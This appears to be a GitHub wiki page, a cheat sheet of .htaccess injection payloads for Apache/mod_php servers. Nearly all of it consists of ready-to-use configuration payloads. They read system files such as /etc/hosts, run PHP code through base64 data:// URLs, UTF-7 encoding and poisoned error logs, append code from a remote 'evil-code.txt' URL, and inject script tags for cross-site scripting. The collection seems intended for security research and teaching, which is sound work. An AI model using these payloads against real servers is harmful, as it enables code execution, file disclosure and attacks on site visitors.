-
Notifications
You must be signed in to change notification settings - Fork 133
PHP htaccess injection cheat sheet
bef edited this page Oct 27, 2014
·
3 revisions
In a setup of Apache/mod_php an attacker is able to inject .htaccess (or php.ini or apache configuration). The injection directory has AllowOverride Options set (or AllowOverride All, which is very common as well).
index.php: (empty)
.htaccess:
php_value auto_append_file /etc/hosts
index.php: (empty)
.htaccess:
php_value auto_append_file .htaccess
#<?php phpinfo();
index.php: (empty)
.htaccess:
php_flag allow_url_include 1
php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==
#php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B
#php_value auto_append_file https://sektioneins.de/evil-code.txt
index.php: (empty)
.htaccess:
php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"
php_value auto_append_file .htaccess
#+ADw-script+AD4-alert(1)+ADsAPA-/script+AD4 #+ADw?php phpinfo()+ADs
index.php: (produces error message)
<?php
include('foo');
.htaccess:
php_flag display_errors 1
php_flag html_errors 1
php_value docref_root "'><script>alert(1);</script>"
index.php:
<?php
include('foo');
.htaccess:
php_flag display_errors 1
php_flag html_errors 1
php_value docref_root "x"
php_value docref_ext "<script>alert(1);</script>"
Assumtion: phps source handler is activated.
<FilesMatch ".+\.phps$">
SetHandler application/x-httpd-php-source
Order Allow,Deny
Allow from all
</FilesMatch>
index.phps:
<?php
test();
// comment
?>
text
.htaccess:
php_value highlight.comment '"><script>alert(1);</script>'
index.php:
<?php
highlight_file(__FILE__);
// comment
.htaccess:
php_value highlight.comment '"><script>alert(1);</script>'
In this example PHP correctly encodes HTML entities in log messages. The injection fails.
index.php:
<?php include('foo');
.htaccess:
php_value error_log /var/www/ex4a/foo.php
php_value include_path "<?php phpinfo(); __halt_compiler();"
index.php: (empty)
.htaccess:
php_value error_log /var/www/ipc/ex4b/foo.php
php_value auto_prepend_file "<?php phpinfo(); __halt_compiler();"
index.php: (empty)
.htaccess:
php_value error_log /var/www/ipc/ex4c/foo.php
#---- "<?php phpinfo(); __halt_compiler();" in UTF-7:
php_value include_path "+ADw?php phpinfo()+ADs +AF8AXw-halt+AF8-compiler()+ADs"
php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"
index.php:
<?php some_code();
.htaccess:
php_flag engine 0